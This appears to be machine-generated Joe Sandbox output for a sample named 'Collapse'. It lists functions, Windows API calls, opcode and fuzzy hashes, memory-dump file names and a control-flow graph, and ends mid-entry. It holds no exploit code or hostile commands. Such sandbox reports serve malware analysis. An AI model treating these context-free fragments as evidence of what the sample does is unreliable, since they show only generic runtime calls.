                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 485612231-0
                                                                                                        • Opcode ID: d4497d3dbc83d6c53ee048c2e1d9b508941009c25dc3bed7a3f997585f0ee936
                                                                                                        • Instruction ID: 5e1cbf97e38b900854e4cf75d9a1c8e58c6b9d0793d2038f04961aed691a2790
                                                                                                        • Opcode Fuzzy Hash: d4497d3dbc83d6c53ee048c2e1d9b508941009c25dc3bed7a3f997585f0ee936
                                                                                                        • Instruction Fuzzy Hash: D0E08C32108204ABCF112BA8BC09B993BDCEB847A6F184120F609DA4B6EA308850E7C4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 383 981ea0-981ef0 call 998c80 call 9841a0 388 981f23-981f2f 383->388 389 981ef6-981f18 call 9841a0 383->389 391 981f60-981f8d call 9841c0 call 984270 388->391 397 981f1e 389->397 398 981f34-981f5b call 9841a0 389->398 402 981fa3-981ffa call 9843a0 call 984290 call 9843d0 call 984420 391->402 403 981f93-981f9e 391->403 397->388 398->391 419 9820b8 402->419 420 982000 402->420 404 982277-9822c1 call 9845c0 call 984610 call 98ba3f 403->404 422 9820bd-9820c8 419->422 421 982005-982013 420->421 423 982019-98207e call 984460 call 984510 call 984480 call 984530 call 984440 421->423 424 9820b3 421->424 425 9820ce-9820df 422->425 426 9820e3-9820e9 422->426 467 982089-982094 423->467 468 982084-9820ae 423->468 424->419 425->426 428 9820ef-982195 426->428 429 9820f4-982129 call 984460 call 984540 call 984480 426->429 434 98219b 428->434 435 982253-982274 call 984570 428->435 451 98212e-982157 call 984530 call 984440 429->451 438 9821a0-9821ae 434->438 435->404 442 98224e 438->442 443 9821b4-982219 call 984460 call 984510 call 984480 call 984530 call 984440 438->443 442->435 477 98221f-982249 443->477 478 982224-98222f 443->478 465 98215d 451->465 466 982162-982169 451->466 471 98216d-98218b 465->471 466->471 467->424 468->421 471->422 477->438 478->442
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4218353326-0
                                                                                                        • Opcode ID: ce5a000887e38cdbff7b016a3b1f1ec9d62dbbb8c3cd3e95c12c115138e977ab
                                                                                                        • Instruction ID: 5164d150f8f98385fb46f1a95993a6edeeda1f891450d55ff86cccad9b88d8d5
                                                                                                        • Opcode Fuzzy Hash: ce5a000887e38cdbff7b016a3b1f1ec9d62dbbb8c3cd3e95c12c115138e977ab
                                                                                                        • Instruction Fuzzy Hash: 26C105746083418FCB04EF68D585B2ABBE0EF99754F10892DF996CB3A1E735D944CB42
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4dbeb59ad7581d437bf51e090bd2a5c89c0054395753c8edf468db1a53df0fb8
                                                                                                        • Instruction ID: de84b7159144e2524e35cf735945baf39b648c1ff6c1a94ebc573540a83ca362
                                                                                                        • Opcode Fuzzy Hash: 4dbeb59ad7581d437bf51e090bd2a5c89c0054395753c8edf468db1a53df0fb8
                                                                                                        • Instruction Fuzzy Hash: AF418CB2A1011AAFCB14EF68C4909EDB7B9FF09310B54016AE542E7741EB31ED45DBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d165c040ee5a9eabecc618a035414ae79f096509c89c0b1316d4e9dea8e1b597
                                                                                                        • Instruction ID: 8309bdbe5bb399fa7183014a66cc5047028c96bad5b6f7f0070cab76b490323f
                                                                                                        • Opcode Fuzzy Hash: d165c040ee5a9eabecc618a035414ae79f096509c89c0b1316d4e9dea8e1b597
                                                                                                        • Instruction Fuzzy Hash: 3501F5336242159B9F169FACFE8199B33AEBBC47303244728F6148B094DB38A800A7D0
                                                                                                        APIs
                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 0098B5BB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cpp_errorThrow_std::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2134207285-0
                                                                                                        • Opcode ID: e4f89ebd2aef0ce775da037dd10ee37e886388bbae9ce4bf0a3e4e24989ce5b8
                                                                                                        • Instruction ID: c535a01d7fa8aa885df96ffb6ce743e9e83791635f0d45d497f20a075402ea0f
                                                                                                        • Opcode Fuzzy Hash: e4f89ebd2aef0ce775da037dd10ee37e886388bbae9ce4bf0a3e4e24989ce5b8
                                                                                                        • Instruction Fuzzy Hash: A521C9B4914209DFDB04EFA8C555BAEBBF0BF88310F04886DE445AB360E734AA45CF91
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000000,0099CD3A,?,?,0099CD3A,00000220,?,00000000,?), ref: 0099AD93
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: ae6acae656618880a1ddbeace4e6ca07f9daf18550d33e5b454fa6f50f93a2fc
                                                                                                        • Instruction ID: 164d33d526f4da84b59094b1129d9ec5c8737d181b90fa845cf284e8755af73e
                                                                                                        • Opcode Fuzzy Hash: ae6acae656618880a1ddbeace4e6ca07f9daf18550d33e5b454fa6f50f93a2fc
                                                                                                        • Instruction Fuzzy Hash: E9E09B3514561156EF2226FE9C01B5B779CDFC57B3F194220EC05D69D1EF14DC0096E6
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __floor_pentium4
                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                        • Opcode ID: b504a04af39ce8a19a37fc90962472edc94c80a716ae793ee6680897c3c534bd
                                                                                                        • Instruction ID: f8427ed6d172c2ee814c8de832d03fec98036ce19702b02370508dc0994fb242
                                                                                                        • Opcode Fuzzy Hash: b504a04af39ce8a19a37fc90962472edc94c80a716ae793ee6680897c3c534bd
                                                                                                        • Instruction Fuzzy Hash: 7BD24D71E082298FDF65CE28DD457EAB7B9EB45304F1845EAD40DE7240DB78AE818F81
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,009A0198,00000002,00000000,?,?,?,009A0198,?,00000000), ref: 009A0860
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,009A0198,00000002,00000000,?,?,?,009A0198,?,00000000), ref: 009A0889
                                                                                                        • GetACP.KERNEL32(?,?,009A0198,?,00000000), ref: 009A089E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: 2f5dae94e1bda38bf491eb79e4aefeaecb442cf532836418af49e8c355c0f7f6
                                                                                                        • Instruction ID: 2cae0c8040b1c5c8c6ef5fec91629d79374a24d641179ab29db74962aa24ecdf
                                                                                                        • Opcode Fuzzy Hash: 2f5dae94e1bda38bf491eb79e4aefeaecb442cf532836418af49e8c355c0f7f6
                                                                                                        • Instruction Fuzzy Hash: 4021B022A40101AADB34CF5CCA40A9777AEEFD6F60B578424E90AD7115E73BDE40D3D8
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 009A016A
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 009A01A8
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 009A01BB
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 009A0203
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 009A021E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 415426439-0
                                                                                                        • Opcode ID: 27377b9ba10f1ea96bc34b8a87661344795971634e373bd851826e8e4d294b1f
                                                                                                        • Instruction ID: e24d3e8060b143dd30d44879f068afb565eedf5823552b5f1c3c919671c4dce9
                                                                                                        • Opcode Fuzzy Hash: 27377b9ba10f1ea96bc34b8a87661344795971634e373bd851826e8e4d294b1f
                                                                                                        • Instruction Fuzzy Hash: 2B518E71A44206AFDF20DFA5CC45BBAB7BCFF86700F144529E914E7191E7B19904CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                                        • Instruction ID: a0260da1b92cb1ff9004de9c9ed0a198fed6290f11c1224337333e7ba1ee9987
                                                                                                        • Opcode Fuzzy Hash: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                                        • Instruction Fuzzy Hash: F4021C71E012199BDF14CFADD880AAEB7B5FF49314F25826DE519E7380D731A941CB90
                                                                                                        APIs
                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A0E99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 1974802433-0
                                                                                                        • Opcode ID: 3adde572dfd79567f5640e2be8b94f8dee332eb5788f13d7ba39ea47b5ac2a4d
                                                                                                        • Instruction ID: 88507edbab113dea796688dc89283a3f01dbc50664673eed09c6d2ef88629ab6
                                                                                                        • Opcode Fuzzy Hash: 3adde572dfd79567f5640e2be8b94f8dee332eb5788f13d7ba39ea47b5ac2a4d
                                                                                                        • Instruction Fuzzy Hash: 1371E47294516C5FDF30EF28CC89AAEBBB9EB86300F1441D9E449A3251EB315E849F90
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0098E438
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0098E504
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0098E51D
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0098E527
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 254469556-0
                                                                                                        • Opcode ID: 194f89f1063fa3e8ede78c62f6f81f6f8dc4aa4737ac8d83b828b84c6f50f681
                                                                                                        • Instruction ID: 06d1e9825005c5ae3c93a92e878fb9c517afc07ef513114c8c9cfa5d73766741
                                                                                                        • Opcode Fuzzy Hash: 194f89f1063fa3e8ede78c62f6f81f6f8dc4aa4737ac8d83b828b84c6f50f681
                                                                                                        • Instruction Fuzzy Hash: AD31F5B5D052289BDF21EFA5D9497CDBBB8AF08304F1041AAE40CAB250EB709B85DF45
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009A03A2
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009A03EC
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009A04B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 661929714-0
                                                                                                        • Opcode ID: 337d0397867027d507568679455c3fde70bed0cfde430645ad59f5dd52819e75
                                                                                                        • Instruction ID: aacd5e259a65755ad111ebe95fac224a817892cd481a8438978bc666f19f0445
                                                                                                        • Opcode Fuzzy Hash: 337d0397867027d507568679455c3fde70bed0cfde430645ad59f5dd52819e75
                                                                                                        • Instruction Fuzzy Hash: B961C1719041079FEB28DF29CD82BAA77ACFF89310F104569E905C6285FB38D994DF90
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 009973F5
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009973FF
                                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0099740C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: 285b21edbf2dbe765674862c36b2296026279c6e9061ffbe6b22e34af93699e8
                                                                                                        • Instruction ID: 3250904e0c90e71da194c0a880ebbb2cc275fba3cd230c7eba00a7da7e7c1121
                                                                                                        • Opcode Fuzzy Hash: 285b21edbf2dbe765674862c36b2296026279c6e9061ffbe6b22e34af93699e8
                                                                                                        • Instruction Fuzzy Hash: 0231E9749112299BCF21DF69DD8978DBBB8BF48310F5041EAE41CA7261E7709F818F44
                                                                                                        APIs
                                                                                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,0098EA53,?,?,?,?,0098EA77,000000FF,?,?,?,0098E971,00000000), ref: 0098EB88
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,F1D6E486,?,?,009AB30E,000000FF,?,0098EA53,?,?,?,?,0098EA77,000000FF,?), ref: 0098EB8C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$FileSystem$Precise
                                                                                                        • String ID:
                                                                                                        • API String ID: 743729956-0
                                                                                                        • Opcode ID: 4c6f1b55f255f014ffcc499e6b8024c29512a84fd86e08d2bde93d7695854709
                                                                                                        • Instruction ID: 258759e2e38b3ef304e22a97812bf820b8f55ce8edb56146007373fca5ae08e6
                                                                                                        • Opcode Fuzzy Hash: 4c6f1b55f255f014ffcc499e6b8024c29512a84fd86e08d2bde93d7695854709
                                                                                                        • Instruction Fuzzy Hash: CBF0E536A48524EFCB119F44DD01B5DBBECFB48F20F00436AE80293790DB38A8009BC4
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009A435A,?,?,?,?,?,?,00000000), ref: 009A462C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3997070919-0
                                                                                                        • Opcode ID: 8d2a791450e1565046fcd4e737bdad2c01cef58116e918cc1312b5375f11043b
                                                                                                        • Instruction ID: 3e229ffd28d5313782206689b3fa1f596cf72683d42cae7050a2950e5a435cd4
